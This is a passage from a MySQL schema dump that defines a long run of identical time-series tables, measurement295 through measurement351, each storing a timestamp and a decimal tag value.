SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement295` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement296`
--
DROP TABLE IF EXISTS `measurement296`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement296` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement297`
--
DROP TABLE IF EXISTS `measurement297`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement297` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement298`
--
DROP TABLE IF EXISTS `measurement298`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement298` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement299`
--
DROP TABLE IF EXISTS `measurement299`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement299` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement3`
--
DROP TABLE IF EXISTS `measurement3`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement3` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement30`
--
DROP TABLE IF EXISTS `measurement30`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement30` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement300`
--
DROP TABLE IF EXISTS `measurement300`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement300` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement301`
--
DROP TABLE IF EXISTS `measurement301`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement301` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement302`
--
DROP TABLE IF EXISTS `measurement302`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement302` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement303`
--
DROP TABLE IF EXISTS `measurement303`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement303` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement304`
--
DROP TABLE IF EXISTS `measurement304`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement304` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement305`
--
DROP TABLE IF EXISTS `measurement305`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement305` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement306`
--
DROP TABLE IF EXISTS `measurement306`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement306` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement307`
--
DROP TABLE IF EXISTS `measurement307`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement307` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement308`
--
DROP TABLE IF EXISTS `measurement308`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement308` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement309`
--
DROP TABLE IF EXISTS `measurement309`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement309` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement31`
--
DROP TABLE IF EXISTS `measurement31`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement31` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement310`
--
DROP TABLE IF EXISTS `measurement310`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement310` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement311`
--
DROP TABLE IF EXISTS `measurement311`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement311` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement312`
--
DROP TABLE IF EXISTS `measurement312`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement312` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement313`
--
DROP TABLE IF EXISTS `measurement313`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement313` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement314`
--
DROP TABLE IF EXISTS `measurement314`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement314` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement315`
--
DROP TABLE IF EXISTS `measurement315`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement315` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement316`
--
DROP TABLE IF EXISTS `measurement316`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement316` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement317`
--
DROP TABLE IF EXISTS `measurement317`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement317` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement318`
--
DROP TABLE IF EXISTS `measurement318`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement318` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement319`
--
DROP TABLE IF EXISTS `measurement319`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement319` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement32`
--
DROP TABLE IF EXISTS `measurement32`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement32` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement320`
--
DROP TABLE IF EXISTS `measurement320`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement320` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement321`
--
DROP TABLE IF EXISTS `measurement321`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement321` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement322`
--
DROP TABLE IF EXISTS `measurement322`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement322` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement323`
--
DROP TABLE IF EXISTS `measurement323`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement323` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement324`
--
DROP TABLE IF EXISTS `measurement324`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement324` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement325`
--
DROP TABLE IF EXISTS `measurement325`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement325` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement326`
--
DROP TABLE IF EXISTS `measurement326`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement326` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement327`
--
DROP TABLE IF EXISTS `measurement327`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement327` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement328`
--
DROP TABLE IF EXISTS `measurement328`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement328` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement329`
--
DROP TABLE IF EXISTS `measurement329`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement329` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement33`
--
DROP TABLE IF EXISTS `measurement33`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement33` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement330`
--
DROP TABLE IF EXISTS `measurement330`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement330` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement331`
--
DROP TABLE IF EXISTS `measurement331`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement331` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement332`
--
DROP TABLE IF EXISTS `measurement332`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement332` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement333`
--
DROP TABLE IF EXISTS `measurement333`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement333` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement334`
--
DROP TABLE IF EXISTS `measurement334`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement334` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement335`
--
DROP TABLE IF EXISTS `measurement335`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement335` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement336`
--
DROP TABLE IF EXISTS `measurement336`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement336` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement337`
--
DROP TABLE IF EXISTS `measurement337`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement337` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement338`
--
DROP TABLE IF EXISTS `measurement338`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement338` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement339`
--
DROP TABLE IF EXISTS `measurement339`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement339` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement34`
--
DROP TABLE IF EXISTS `measurement34`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement34` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement340`
--
DROP TABLE IF EXISTS `measurement340`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement340` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement341`
--
DROP TABLE IF EXISTS `measurement341`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement341` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement342`
--
DROP TABLE IF EXISTS `measurement342`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement342` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement343`
--
DROP TABLE IF EXISTS `measurement343`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement343` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement344`
--
DROP TABLE IF EXISTS `measurement344`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement344` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement345`
--
DROP TABLE IF EXISTS `measurement345`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement345` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement346`
--
DROP TABLE IF EXISTS `measurement346`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement346` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement347`
--
DROP TABLE IF EXISTS `measurement347`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement347` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement348`
--
DROP TABLE IF EXISTS `measurement348`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement348` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement349`
--
DROP TABLE IF EXISTS `measurement349`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement349` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement35`
--
DROP TABLE IF EXISTS `measurement35`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement35` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement350`
--
DROP TABLE IF EXISTS `measurement350`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement350` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement351`
--
DROP TABLE IF EXISTS `measurement351`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement351` (
`Moment` datetime NOT NULL,
